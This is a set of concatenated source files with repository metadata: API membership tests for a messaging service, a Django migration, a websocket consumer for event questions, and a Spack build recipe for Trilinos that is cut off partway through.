        result['code'] | should.be.equal.to(403)
        result['response']['message'].lower() | should.contain('is not a member of the thread')
        logging.info('Accepting invitation to a thread %s' % self.thread_id)
        result = ThreadsMethods().accept_invitation_to_thread(authorization=thread_auth_headers,
                                                              invitation_id=invitation_id, accept=True)
        logging.info('Server returned %s' % result)
        logging.info('Creating sample message as invited and accepted user in thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
                                                                       message=message)
        logging.info('Server returned %s' % result)
        result['code'] | should.be.equal.to(200)

    def test_10_create_message_by_kicked_user(self):
        """A former member who was kicked can no longer post (403)."""
        account_data = SignupMethods().create_test_account(generate_fields=True)
        account_id = account_data[1]['response']['id']
        data_to_encode = account_data[0]['username'] + ':' + account_data[0]['password']
        encoded_credentials = self.encoder.encode_data(data_to_encode)
        thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
        logging.info('Inviting user to thread %s' % self.thread_id)
        result = ThreadsMethods().invite_user_to_thread(authorization=self.thread_auth_headers,
                                                        thread_id=self.thread_id,
                                                        user_id=account_id)
        logging.info('Server returned %s' % result)
        invitation_id = result['response'][0]['id']
        logging.info('Accepting invitation to a thread %s' % self.thread_id)
        result = ThreadsMethods().accept_invitation_to_thread(authorization=thread_auth_headers,
                                                              invitation_id=invitation_id, accept=True)
        logging.info('Server returned %s' % result)
        logging.info('Kicking user from a thread %s' % self.thread_id)
        result = ThreadsMethods().kick_user_from_thread(authorization=self.thread_auth_headers,
                                                        thread_id=self.thread_id, user_id=account_id)
        logging.info('Server returned %s' % result)
        message = self.rand.generate_random_string(50)
        logging.info('Creating sample message as kicked user in thread %s' % self.thread_id)
        result = MessageMethods(self.thread_id).send_message_in_thread(authorization=thread_auth_headers,
                                                                       message=message)
        logging.info('Server returned %s' % result)
        result['code'] | should.be.equal.to(403)
        result['response']['message'].lower() | should.contain('is not a member of the thread')

    @classmethod
    def tearDownClass(cls):
        # Best-effort clean-up of the shared thread created in setUpClass.
        if cls.auth_header is not None and cls.thread_to_delete is not None:
            logging.info('Deleting sample thread created for tests')
            ThreadsMethods().delete_thread(authorization=cls.auth_header, thread_id=cls.thread_to_delete)
"michal.domoslawski@codahead.com"
] | michal.domoslawski@codahead.com |
640b1ecbbff09f8d8ae3a1a9b0aa9c8146f0a093 | 4ba6207a7e4aa84da494e0f6d811eca606659b73 | /groupster/migrations/0003_jobseeker_resume.py | 5f0af9769b89646d52c1f168f716bf3a2099c0e6 | [] | no_license | jkol36/groupster | da5d9d4b882cd9df7a4b187b65cdc3fe8175e794 | 5967cb7b2689dec760727c7534ff0f73a6901ba4 | refs/heads/master | 2021-01-02T09:19:49.841001 | 2015-06-10T18:57:37 | 2015-06-10T18:57:37 | 35,061,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Re-adds the ``resume`` file field to JobSeeker (removed in 0002)."""

    dependencies = [
        ('groupster', '0002_remove_jobseeker_resume'),
    ]

    operations = [
        migrations.AddField(
            model_name='jobseeker',
            name='resume',
            # NOTE(review): upload_to=b'' stores files directly under
            # MEDIA_ROOT, and default=None without null=True may fail
            # validation on existing rows -- confirm intent.
            field=models.FileField(default=None, upload_to=b''),
        ),
    ]
| [
"jonathankolman@gmail.com"
] | jonathankolman@gmail.com |
857103b7046057d8706f792b275140f428e91cfe | d3aaceff6cc95097f9715b9517806a47d38133c0 | /bbakdoc/events/consumers.py | 041dd11893da0a68aa062b1a63489a99ccdda2fd | [] | no_license | SELO77/django-template2 | 5f7b4febdb4ea056cf833ec3125f1935b55f4c69 | b5eafd736b2a8065fbc690b6378d3f4e8ee64834 | refs/heads/master | 2020-05-17T03:05:38.151735 | 2019-06-10T12:42:35 | 2019-06-10T12:42:35 | 183,469,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,955 | py | import json
import logging
from channels.db import database_sync_to_async
from channels.generic.websocket import AsyncWebsocketConsumer, WebsocketConsumer, AsyncJsonWebsocketConsumer
# @database_sync_to_async
# def get_user_email(scope):
# return scope.user.email
from bbakdoc.events.models import EventQuestion
class EventConsumer(AsyncJsonWebsocketConsumer):
    """WebSocket consumer for live audience questions during an event.

    Each connection joins the channel-layer group ``event_<room_name>``;
    questions received from any client are persisted and broadcast to
    every member of the group.
    """
    # class EventConsumer(WebsocketConsumer):
    async def connect(self):
        # Room name comes from the URL route, e.g. /ws/event/<room_name>/.
        self.room_name = self.scope['url_route']['kwargs']['room_name']
        self.room_group_name = f'event_{self.room_name}'
        # Join room group
        # Add exception handling when redis turn off
        await self.channel_layer.group_add(
            self.room_group_name,
            self.channel_name,
        )
        await self.accept()

    async def disconnect(self, code):
        # Leave the room group; the channel itself is closed by the framework.
        await self.channel_layer.group_discard(
            self.room_group_name,
            self.channel_name,
        )

    @database_sync_to_async
    def create_question(self, content, questioner):
        """Persist one question and return the created EventQuestion row."""
        obj = EventQuestion.objects.create(
            # NOTE(review): room names appear to be event ids offset by
            # 1000 (room 1001 -> event 1) -- confirm this convention; a
            # non-numeric room name would raise ValueError here.
            event_id=int(self.room_name)-1000,
            content=content,
            questioner=questioner,
        )
        return obj

    # Receive message from WebSocket
    async def receive_json(self, content, **kwargs):
        """Store an incoming question and fan it out to the room group."""
        question = content['question']
        # Missing questioner field falls back to an anonymous label.
        questioner = content.get('questioner', 'Anonymous')
        question_obj = await self.create_question(question, questioner)
        # Send message to room group
        await self.channel_layer.group_send(
            self.room_group_name,
            {
                # 'type' selects the handler method (push_question) on
                # every consumer in the group.
                'type': 'push_question',
                'content': question_obj.content,
                'questioner': question_obj.questioner,
                'likes': question_obj.likes,
            }
        )

    # Receive message from room group
    async def push_question(self, event):
        # Relay the group event verbatim to this consumer's client.
        await self.send_json(event)
| [
"seloselo1001@gmail.com"
] | seloselo1001@gmail.com |
46d2d07519f75a97e9add74926ea8d86907ad63c | caebb55c3d03a9dad4888a27394733896cf1fd65 | /configs/machines/mira/trilinos/package.py | 76a98f4c3fdd9c1bc6a12c3d87344914c8701aba | [] | no_license | mclarsen/build-test | 70d82e5cf7dcba8868263626ce168aab4df0e35e | 8861bf717335c1afef34967325c5dc3359f5fdb8 | refs/heads/master | 2020-03-19T00:41:20.426014 | 2018-05-29T22:16:12 | 2018-05-29T22:16:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,070 | py | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
import os
import sys
from spack import *
from spack.operating_systems.mac_os import macOS_version
# Trilinos is complicated to build, as an inspiration a couple of links to
# other repositories which build it:
# https://github.com/hpcugent/easybuild-easyblocks/blob/master/easybuild/easyblocks/t/trilinos.py#L111
# https://github.com/koecher/candi/blob/master/deal.II-toolchain/packages/trilinos.package
# https://gitlab.com/configurations/cluster-config/blob/master/trilinos.sh
# https://github.com/Homebrew/homebrew-science/blob/master/trilinos.rb and some
# relevant documentation/examples:
# https://github.com/trilinos/Trilinos/issues/175
class Trilinos(CMakePackage):
    """The Trilinos Project is an effort to develop algorithms and enabling
    technologies within an object-oriented software framework for the solution
    of large-scale, complex multi-physics engineering and scientific problems.
    A unique design feature of Trilinos is its focus on packages.
    """
    homepage = "https://trilinos.org/"
    url = "https://github.com/trilinos/Trilinos/archive/trilinos-release-12-12-1.tar.gz"
    maintainers = ['aprokop']
    # ###################### Versions ##########################
    # Release tarballs are checksummed; the named versions track git tags.
    version('xsdk-0.2.0',
            git='https://github.com/trilinos/Trilinos.git', tag='xsdk-0.2.0')
    version('develop',
            git='https://github.com/trilinos/Trilinos.git', tag='develop')
    version('master',
            git='https://github.com/trilinos/Trilinos.git', tag='master')
    version('12.12.1', 'ecd4606fa332212433c98bf950a69cc7')
    version('12.10.1', '667333dbd7c0f031d47d7c5511fd0810')
    version('12.8.1', '9f37f683ee2b427b5540db8a20ed6b15')
    version('12.6.4', 'e11fff717d0e4565779f75a47feecbb2')
    version('12.6.3', '9ce30b6ab956bfc41730479a9ef05d05')
    version('12.6.2', '0237d32feedd979a6fbb139aa5df8500')
    version('12.6.1', '14ab8f7e74b66c33d5731cbf68b8cb82')
    version('12.4.2', '98880f414752220e60feaeb36b023f60')
    version('12.2.1', '8b344a9e9e533126dfd96db58ce69dde')
    version('12.0.1', 'b8263f7037f7c688091d0da19d169709')
    version('11.14.3', 'ff31ad49d633ab28369c228784055c85')
    version('11.14.2', '1fdf15a5b4494f832b414f9c447ab685')
    version('11.14.1', '478d0438d935294a7c94347c94a7c8cb')
    # ###################### Variants ##########################
    # Other
    # not everyone has py-numpy activated, keep it disabled by default to avoid
    # configure errors
    variant('python', default=False,
            description='Build python wrappers')
    # Build options
    variant('fortran', default=True,
            description='Compile with Fortran support')
    variant('instantiate', default=True,
            description='Compile with explicit instantiation')
    variant('instantiate_cmplx', default=False,
            description='Compile with explicit instantiation for complex')
    variant('openmp', default=False,
            description='Enable OpenMP')
    variant('shared', default=True,
            description='Enables the build of shared libraries')
    variant('xsdkflags', default=False,
            description='Compile using the default xSDK configuration')
    # TPLs (alphabet order)
    variant('boost', default=True,
            description='Compile with Boost')
    variant('cgns', default=False,
            description='Enable CGNS')
    variant('exodus', default=True,
            description='Compile with Exodus from SEACAS')
    variant('gtest', default=True,
            description='Compile with Gtest')
    variant('hdf5', default=True,
            description='Compile with HDF5')
    variant('hypre', default=True,
            description='Compile with Hypre preconditioner')
    variant('metis', default=True,
            description='Compile with METIS and ParMETIS')
    variant('mumps', default=True,
            description='Compile with support for MUMPS solvers')
    variant('pnetcdf', default=False,
            description='Compile with parallel-netcdf')
    variant('suite-sparse', default=True,
            description='Compile with SuiteSparse solvers')
    variant('superlu-dist', default=True,
            description='Compile with SuperluDist solvers')
    variant('superlu', default=False,
            description='Compile with SuperLU solvers')
    variant('x11', default=False,
            description='Compile with X11')
    variant('zlib', default=False,
            description='Compile with zlib')
    # Package options (alphabet order)
    variant('alloptpkgs', default=False,
            description='Compile with all optional packages')
    variant('amesos', default=True,
            description='Compile with Amesos')
    variant('amesos2', default=True,
            description='Compile with Amesos2')
    variant('anasazi', default=True,
            description='Compile with Anasazi')
    variant('aztec', default=True,
            description='Compile with Aztec')
    variant('belos', default=True,
            description='Compile with Belos')
    variant('epetra', default=True,
            description='Compile with Epetra')
    variant('epetraext', default=True,
            description='Compile with EpetraExt')
    variant('ifpack', default=True,
            description='Compile with Ifpack')
    variant('ifpack2', default=True,
            description='Compile with Ifpack2')
    variant('intrepid', default=False,
            description='Enable Intrepid')
    variant('intrepid2', default=False,
            description='Enable Intrepid2')
    variant('kokkos', default=True,
            description='Compile with Kokkos')
    variant('ml', default=True,
            description='Compile with ML')
    variant('muelu', default=True,
            description='Compile with Muelu')
    variant('nox', default=False,
            description='Enable NOX')
    variant('rol', default=False,
            description='Enable ROL')
    variant('sacado', default=True,
            description='Compile with Sacado')
    variant('stk', default=False,
            description='Compile with STK')
    variant('shards', default=False,
            description='Enable Shards')
    variant('teuchos', default=True,
            description='Compile with Teuchos')
    variant('tpetra', default=True,
            description='Compile with Tpetra')
    variant('zoltan', default=True,
            description='Compile with Zoltan')
    variant('zoltan2', default=True,
            description='Compile with Zoltan2')
    # External package options
    variant('dtk', default=False,
            description='Enable DataTransferKit')
    variant('fortrilinos', default=False,
            description='Enable ForTrilinos')
    # External repos cloned into the Trilinos source tree when requested.
    resource(name='dtk',
             git='https://github.com/ornl-cees/DataTransferKit',
             tag='master',
             placement='DataTransferKit',
             when='+dtk')
    resource(name='fortrilinos',
             git='https://github.com/trilinos/ForTrilinos',
             tag='develop',
             placement='packages/ForTrilinos',
             when='+fortrilinos')
    # Inter-package requirements: these Trilinos packages build on Kokkos/Tpetra.
    conflicts('+tpetra', when='~kokkos')
    conflicts('+intrepid2', when='~kokkos')
    conflicts('+amesos2', when='~tpetra')
    conflicts('+ifpack2', when='~tpetra')
    conflicts('+zoltan2', when='~tpetra')
    conflicts('+dtk', when='~tpetra')
    conflicts('+fortrilinos', when='~fortran')
    conflicts('+fortrilinos', when='@:99')
    conflicts('+fortrilinos', when='@master')
    # Can only use one type of SuperLU
    conflicts('+superlu-dist', when='+superlu')
    # For Trilinos v11 we need to force SuperLUDist=OFF, since only the
    # deprecated SuperLUDist v3.3 together with an Amesos patch is working.
    conflicts('+superlu-dist', when='@11.4.1:11.14.3')
    # PnetCDF was only added after v12.10.1
    conflicts('+pnetcdf', when='@0:12.10.1')
    # ###################### Dependencies ##########################
    # Everything should be compiled position independent (-fpic)
    depends_on('blas')
    depends_on('lapack')
    depends_on('boost', when='+boost')
    depends_on('boost', when='+dtk')
    depends_on('matio')
    depends_on('glm')
    depends_on('metis@5:', when='+metis')
    depends_on('suite-sparse', when='+suite-sparse')
    depends_on('zlib', when="+zlib")
    # MPI related dependencies
    depends_on('mpi')
    # NOTE(review): netcdf/parallel-netcdf are unconditional here (this is a
    # site-specific Mira config), not gated on the +pnetcdf variant.
    depends_on('netcdf+mpi+parallel-netcdf')
    depends_on('parallel-netcdf')
    depends_on('parmetis', when='+metis')
    depends_on('cgns', when='+cgns')
    # Trilinos' Tribits config system is limited which makes it very tricky to
    # link Amesos with static MUMPS, see
    # https://trilinos.org/docs/dev/packages/amesos2/doc/html/classAmesos2_1_1MUMPS.html
    # One could work it out by getting linking flags from mpif90 --showme:link
    # (or alike) and adding results to -DTrilinos_EXTRA_LINK_FLAGS together
    # with Blas and Lapack and ScaLAPACK and Blacs and -lgfortran and it may
    # work at the end. But let's avoid all this by simply using shared libs
    depends_on('mumps@5.0:+mpi+shared', when='+mumps')
    depends_on('scalapack', when='+mumps')
    depends_on('superlu-dist', when='+superlu-dist')
    depends_on('superlu-dist@:4.3', when='@:12.6.1+superlu-dist')
    depends_on('superlu-dist@develop', when='@develop+superlu-dist')
    depends_on('superlu-dist@xsdk-0.2.0', when='@xsdk-0.2.0+superlu-dist')
    depends_on('superlu+pic@4.3', when='+superlu')
    # Trilinos can not be built against 64bit int hypre
    depends_on('hypre~internal-superlu~int64', when='+hypre')
    depends_on('hypre@xsdk-0.2.0~internal-superlu', when='@xsdk-0.2.0+hypre')
    depends_on('hypre@develop~internal-superlu', when='@develop+hypre')
    # FIXME: concretizer bug? 'hl' req by netcdf is affecting this code.
    depends_on('hdf5+hl+mpi', when='+hdf5')
    depends_on('python', when='+python')
    depends_on('py-numpy', when='+python', type=('build', 'run'))
    depends_on('swig', when='+python')
    # Build fixes for specific compiler / version combinations.
    patch('umfpack_from_suitesparse.patch', when='@11.14.1:12.8.1')
    patch('xlf_seacas.patch', when='@12.10.1:%xl')
    patch('xlf_seacas.patch', when='@12.10.1:%xl_r')
    patch('xlf_tpetra.patch', when='@12.12.1:%xl')
    patch('xlf_tpetra.patch', when='@12.12.1:%xl_r')
def url_for_version(self, version):
url = "https://github.com/trilinos/Trilinos/archive/trilinos-release-{0}.tar.gz"
return url.format(version.dashed)
def cmake_args(self):
spec = self.spec
cxx_flags = []
options = []
# #################### Base Settings #######################
mpi_bin = spec['mpi'].prefix.bin
options.extend([
'-DTrilinos_VERBOSE_CONFIGURE:BOOL=OFF',
'-DTrilinos_ENABLE_TESTS:BOOL=OFF',
'-DTrilinos_ENABLE_EXAMPLES:BOOL=OFF',
'-DTrilinos_ENABLE_CXX11:BOOL=ON',
'-DBUILD_SHARED_LIBS:BOOL=%s' % (
'ON' if '+shared' in spec else 'OFF'),
'-DTrilinos_EXTRA_LINK_FLAGS:STRING=-L/soft/libraries/hdf5/1.8.17/cnk-gcc/current/lib -Wl,-Bstatic -lhdf5 -L/soft/libraries/alcf/current/gcc/ZLIB/lib -Wl,-Bstatic -lz -L/soft/compilers/gcc/4.8.4/powerpc64-bgq-linux/lib -Wl,-Bstatic -ldl',
#'-DTrilinos_EXTRA_LINK_FLAGS:STRING=-L/soft/libraries/alcf/current/gcc/LAPACK/lib -Wl,-Bstatic -llapack -L/soft/libraries/alcf/current/gcc/BLAS/lib -Wl,-Bstatic -lblas -L/soft/libraries/hdf5/1.8.17/cnk-gcc/current/lib -Wl,-Bstatic -lhdf5 -L/soft/libraries/alcf/current/gcc/ZLIB/lib -Wl,-Bstatic -lz -L/soft/compilers/gcc/4.8.4/powerpc64-bgq-linux/lib -Wl,--no-as-needed -Wl,-Bstatic -ldl -static-libgfortran -Wl,--allow-multiple-definition',
'-DCMAKE_BUILD_WITH_INSTALL_RPATH:BOOL=TRUE',
# The following can cause problems on systems that don't have
# static libraries available for things like dl and pthreads
# for example when trying to build static libs
'-DTPL_FIND_SHARED_LIBS:BOOL=%s' % (
'ON' if '+shared' in spec else 'OFF'),
'-DTrilinos_LINK_SEARCH_START_STATIC:BOOL=%s' % (
'OFF' if '+shared' in spec else 'ON'),
# The following can cause problems on systems that don't have
# static libraries available for things like dl and pthreads
# for example when trying to build static libs
# '-DTPL_FIND_SHARED_LIBS:BOOL=%s' % (
# 'ON' if '+shared' in spec else 'OFF'),
# '-DTrilinos_LINK_SEARCH_START_STATIC:BOOL=%s' % (
# 'OFF' if '+shared' in spec else 'ON'),
# Force Trilinos to use the MPI wrappers instead of raw compilers
# this is needed on Apple systems that require full resolution of
# all symbols when linking shared libraries
'-DTPL_ENABLE_MPI:BOOL=ON',
'-DCMAKE_C_COMPILER=%s' % spec['mpi'].mpicc,
'-DCMAKE_CXX_COMPILER=%s' % spec['mpi'].mpicxx,
'-DCMAKE_Fortran_COMPILER=%s' % spec['mpi'].mpifc,
'-DMPI_BASE_DIR:PATH=%s' % spec['mpi'].prefix
])
# ################## Trilinos Packages #####################
options.extend([
'-DTrilinos_ENABLE_ALL_OPTIONAL_PACKAGES:BOOL=%s' % (
'ON' if '+alloptpkgs' in spec else 'OFF'),
'-DTrilinos_ENABLE_Amesos:BOOL=%s' % (
'ON' if '+amesos' in spec else 'OFF'),
'-DTrilinos_ENABLE_Amesos2:BOOL=%s' % (
'ON' if '+amesos2' in spec else 'OFF'),
'-DTrilinos_ENABLE_Anasazi:BOOL=%s' % (
'ON' if '+anasazi' in spec else 'OFF'),
'-DTrilinos_ENABLE_AztecOO:BOOL=%s' % (
'ON' if '+aztec' in spec else 'OFF'),
'-DTrilinos_ENABLE_Belos:BOOL=%s' % (
'ON' if '+belos' in spec else 'OFF'),
'-DTrilinos_ENABLE_Epetra:BOOL=%s' % (
'ON' if '+epetra' in spec else 'OFF'),
'-DTrilinos_ENABLE_EpetraExt:BOOL=%s' % (
'ON' if '+epetraext' in spec else 'OFF'),
'-DTrilinos_ENABLE_Ifpack:BOOL=%s' % (
'ON' if '+ifpack' in spec else 'OFF'),
'-DTrilinos_ENABLE_Ifpack2:BOOL=%s' % (
'ON' if '+ifpack2' in spec else 'OFF'),
'-DTrilinos_ENABLE_Intrepid=%s' % (
'ON' if '+intrepid' in spec else 'OFF'),
'-DTrilinos_ENABLE_Intrepid2=%s' % (
'ON' if '+intrepid2' in spec else 'OFF'),
'-DTrilinos_ENABLE_Kokkos:BOOL=%s' % (
'ON' if '+kokkos' in spec else 'OFF'),
'-DTrilinos_ENABLE_ML:BOOL=%s' % (
'ON' if '+ml' in spec else 'OFF'),
'-DTrilinos_ENABLE_MueLu:BOOL=%s' % (
'ON' if '+muelu' in spec else 'OFF'),
'-DTrilinos_ENABLE_NOX:BOOL=%s' % (
'ON' if '+nox' in spec else 'OFF'),
'-DTrilinos_ENABLE_PyTrilinos:BOOL=%s' % (
'ON' if '+python' in spec else 'OFF'),
'-DTrilinos_ENABLE_ROL:BOOL=%s' % (
'ON' if '+rol' in spec else 'OFF'),
'-DTrilinos_ENABLE_Sacado:BOOL=%s' % (
'ON' if '+sacado' in spec else 'OFF'),
'-DTrilinos_ENABLE_Shards=%s' % (
'ON' if '+shards' in spec else 'OFF'),
'-DTrilinos_ENABLE_Teuchos:BOOL=%s' % (
'ON' if '+teuchos' in spec else 'OFF'),
'-DTrilinos_ENABLE_Tpetra:BOOL=%s' % (
'ON' if '+tpetra' in spec else 'OFF'),
'-DTrilinos_ENABLE_Zoltan:BOOL=%s' % (
'ON' if '+zoltan' in spec else 'OFF'),
'-DTrilinos_ENABLE_Zoltan2:BOOL=%s' % (
'ON' if '+zoltan2' in spec else 'OFF'),
])
if '+xsdkflags' in spec:
options.extend(['-DUSE_XSDK_DEFAULTS=YES'])
if '+stk' in spec:
# Currently these are fairly specific to the Nalu package
# They can likely change when necessary in the future
options.extend([
'-DTrilinos_ENABLE_STKMesh:BOOL=ON',
'-DTrilinos_ENABLE_STKSimd:BOOL=ON',
'-DTrilinos_ENABLE_STKIO:BOOL=ON',
'-DTrilinos_ENABLE_STKTransfer:BOOL=ON',
'-DTrilinos_ENABLE_STKSearch:BOOL=ON',
'-DTrilinos_ENABLE_STKUtil:BOOL=ON',
'-DTrilinos_ENABLE_STKTopology:BOOL=ON',
'-DTrilinos_ENABLE_STKUnit_tests:BOOL=ON',
'-DTrilinos_ENABLE_STKUnit_test_utils:BOOL=ON',
'-DTrilinos_ENABLE_STKClassic:BOOL=OFF',
'-DTrilinos_ENABLE_STKExprEval:BOOL=ON'
])
if '+dtk' in spec:
options.extend([
'-DTrilinos_EXTRA_REPOSITORIES:STRING=DataTransferKit',
'-DTpetra_INST_INT_UNSIGNED_LONG:BOOL=ON',
'-DTrilinos_ENABLE_DataTransferKit:BOOL=ON'
])
if '+exodus' in spec:
# Currently these are fairly specific to the Nalu package
# They can likely change when necessary in the future
options.extend([
'-DTrilinos_ENABLE_SEACAS:BOOL=ON',
'-DTrilinos_ENABLE_SEACASExodus:BOOL=ON',
'-DTrilinos_ENABLE_SEACASEpu:BOOL=ON',
'-DTrilinos_ENABLE_SEACASExodiff:BOOL=ON',
'-DTrilinos_ENABLE_SEACASNemspread:BOOL=ON',
'-DTrilinos_ENABLE_SEACASNemslice:BOOL=ON',
'-DTrilinos_ENABLE_SEACASIoss:BOOL=ON'
])
else:
options.extend([
'-DTrilinos_ENABLE_SEACAS:BOOL=OFF',
'-DTrilinos_ENABLE_SEACASExodus:BOOL=OFF'
])
# ######################### TPLs #############################
blas = spec['blas'].libs
lapack = spec['lapack'].libs
# Note: -DXYZ_LIBRARY_NAMES= needs semicolon separated list of names
options.extend([
'-DTPL_ENABLE_BLAS=ON',
'-DBLAS_LIBRARY_NAMES=%s' % ';'.join(blas.names),
'-DBLAS_LIBRARY_DIRS=%s' % ';'.join(blas.directories),
'-DTPL_ENABLE_LAPACK=ON',
'-DLAPACK_LIBRARY_NAMES=%s' % ';'.join(lapack.names),
'-DLAPACK_LIBRARY_DIRS=%s' % ';'.join(lapack.directories),
'-DTPL_ENABLE_Netcdf:BOOL=ON',
'-DNetCDF_ROOT:PATH=%s' % spec['netcdf'].prefix,
'-DTPL_ENABLE_X11:BOOL=%s' % (
'ON' if '+x11' in spec else 'OFF'),
'-DTrilinos_ENABLE_Gtest:BOOL=%s' % (
'ON' if '+gtest' in spec else 'OFF'),
])
if '+hypre' in spec:
options.extend([
'-DTPL_ENABLE_HYPRE:BOOL=ON',
'-DHYPRE_INCLUDE_DIRS:PATH=%s' % spec['hypre'].prefix.include,
'-DHYPRE_LIBRARY_DIRS:PATH=%s' % spec['hypre'].prefix.lib
])
if '+boost' in spec:
options.extend([
'-DTPL_ENABLE_Boost:BOOL=ON',
'-DBoost_INCLUDE_DIRS:PATH=%s' % spec['boost'].prefix.include,
'-DBoost_LIBRARY_DIRS:PATH=%s' % spec['boost'].prefix.lib
])
else:
options.extend(['-DTPL_ENABLE_Boost:BOOL=OFF'])
if '+hdf5' in spec:
options.extend([
'-DTPL_ENABLE_HDF5:BOOL=ON',
'-DHDF5_INCLUDE_DIRS:PATH=%s' % spec['hdf5'].prefix.include,
'-DHDF5_LIBRARY_DIRS:PATH=%s' % spec['hdf5'].prefix.lib
])
else:
options.extend(['-DTPL_ENABLE_HDF5:BOOL=OFF'])
if '+suite-sparse' in spec:
options.extend([
# FIXME: Trilinos seems to be looking for static libs only,
# patch CMake TPL file?
'-DTPL_ENABLE_Cholmod:BOOL=OFF',
# '-DTPL_ENABLE_Cholmod:BOOL=ON',
# '-DCholmod_LIBRARY_DIRS:PATH=%s' % (
# spec['suite-sparse'].prefix.lib,
# '-DCholmod_INCLUDE_DIRS:PATH=%s' % (
# spec['suite-sparse'].prefix.include,
'-DTPL_ENABLE_UMFPACK:BOOL=ON',
'-DUMFPACK_LIBRARY_DIRS:PATH=%s' % (
spec['suite-sparse'].prefix.lib),
'-DUMFPACK_INCLUDE_DIRS:PATH=%s' % (
spec['suite-sparse'].prefix.include),
'-DUMFPACK_LIBRARY_NAMES=umfpack;amd;colamd;cholmod;' +
'suitesparseconfig'
])
else:
options.extend([
'-DTPL_ENABLE_Cholmod:BOOL=OFF',
'-DTPL_ENABLE_UMFPACK:BOOL=OFF',
])
if '+metis' in spec:
options.extend([
'-DTPL_ENABLE_METIS:BOOL=ON',
'-DMETIS_LIBRARY_DIRS=%s' % spec['metis'].prefix.lib,
'-DMETIS_LIBRARY_NAMES=metis',
'-DTPL_METIS_INCLUDE_DIRS=%s' % spec['metis'].prefix.include,
'-DTPL_ENABLE_ParMETIS:BOOL=ON',
'-DParMETIS_LIBRARY_DIRS=%s;%s' % (
spec['parmetis'].prefix.lib, spec['metis'].prefix.lib),
'-DParMETIS_LIBRARY_NAMES=parmetis;metis',
'-DTPL_ParMETIS_INCLUDE_DIRS=%s;%s' % (
spec['parmetis'].prefix.include,
spec['metis'].prefix.include)
])
else:
options.extend([
'-DTPL_ENABLE_METIS:BOOL=OFF',
'-DTPL_ENABLE_ParMETIS:BOOL=OFF',
])
if '+mumps' in spec:
scalapack = spec['scalapack'].libs
options.extend([
'-DTPL_ENABLE_MUMPS:BOOL=ON',
'-DMUMPS_LIBRARY_DIRS=%s' % spec['mumps'].prefix.lib,
# order is important!
'-DMUMPS_LIBRARY_NAMES=dmumps;mumps_common;pord',
'-DTPL_ENABLE_SCALAPACK:BOOL=ON',
'-DSCALAPACK_LIBRARY_NAMES=%s' % ';'.join(scalapack.names),
'-DSCALAPACK_LIBRARY_DIRS=%s' % ';'.join(scalapack.directories)
])
# see
# https://github.com/trilinos/Trilinos/blob/master/packages/amesos/README-MUMPS
cxx_flags.extend([
'-DMUMPS_5_0'
])
else:
options.extend([
'-DTPL_ENABLE_MUMPS:BOOL=OFF',
'-DTPL_ENABLE_SCALAPACK:BOOL=OFF',
])
if '+superlu-dist' in spec:
# Amesos, conflicting types of double and complex SLU_D
# see
# https://trilinos.org/pipermail/trilinos-users/2015-March/004731.html
# and
# https://trilinos.org/pipermail/trilinos-users/2015-March/004802.html
options.extend([
'-DTeuchos_ENABLE_COMPLEX:BOOL=OFF',
'-DKokkosTSQR_ENABLE_Complex:BOOL=OFF'
])
options.extend([
'-DTPL_ENABLE_SuperLUDist:BOOL=ON',
'-DSuperLUDist_LIBRARY_DIRS=%s' %
spec['superlu-dist'].prefix.lib,
'-DSuperLUDist_INCLUDE_DIRS=%s' %
spec['superlu-dist'].prefix.include
])
if spec.satisfies('^superlu-dist@4.0:'):
options.extend([
'-DHAVE_SUPERLUDIST_LUSTRUCTINIT_2ARG:BOOL=ON'
])
else:
options.extend([
'-DTPL_ENABLE_SuperLUDist:BOOL=OFF',
])
if '+superlu' in spec:
options.extend([
'-DTPL_ENABLE_SuperLU:BOOL=ON',
'-DSuperLU_LIBRARY_DIRS=%s' %
spec['superlu'].prefix.lib,
'-DSuperLU_INCLUDE_DIRS=%s' %
spec['superlu'].prefix.include
])
else:
options.extend([
'-DTPL_ENABLE_SuperLU:BOOL=OFF',
])
if '+pnetcdf' in spec:
options.extend([
'-DTPL_ENABLE_Pnetcdf:BOOL=ON',
'-DTPL_Netcdf_Enables_Netcdf4:BOOL=ON',
'-DTPL_Netcdf_PARALLEL:BOOL=ON',
'-DPNetCDF_ROOT:PATH=%s' % spec['parallel-netcdf'].prefix
])
else:
options.extend([
'-DTPL_ENABLE_Pnetcdf:BOOL=OFF'
])
if '+zlib' in spec:
options.extend([
'-DTPL_ENABLE_Zlib:BOOL=ON',
'-DZlib_ROOT:PATH=%s' % spec['zlib'].prefix,
])
else:
options.extend([
'-DTPL_ENABLE_Zlib:BOOL=OFF'
])
if '+cgns' in spec:
options.extend([
'-DTPL_ENABLE_CGNS:BOOL=ON',
'-DCGNS_INCLUDE_DIRS:PATH=%s' % spec['cgns'].prefix.include,
'-DCGNS_LIBRARY_DIRS:PATH=%s' % spec['cgns'].prefix.lib
])
else:
options.extend([
'-DTPL_ENABLE_GGNS:BOOL=OFF'
])
# ################# Miscellaneous Stuff ######################
# OpenMP
if '+openmp' in spec:
options.extend([
'-DTrilinos_ENABLE_OpenMP:BOOL=ON',
'-DKokkos_ENABLE_OpenMP:BOOL=ON'
])
if '+tpetra' in spec:
options.extend([
'-DTpetra_INST_OPENMP:BOOL=ON'
])
# Fortran lib
if '+fortran' in spec:
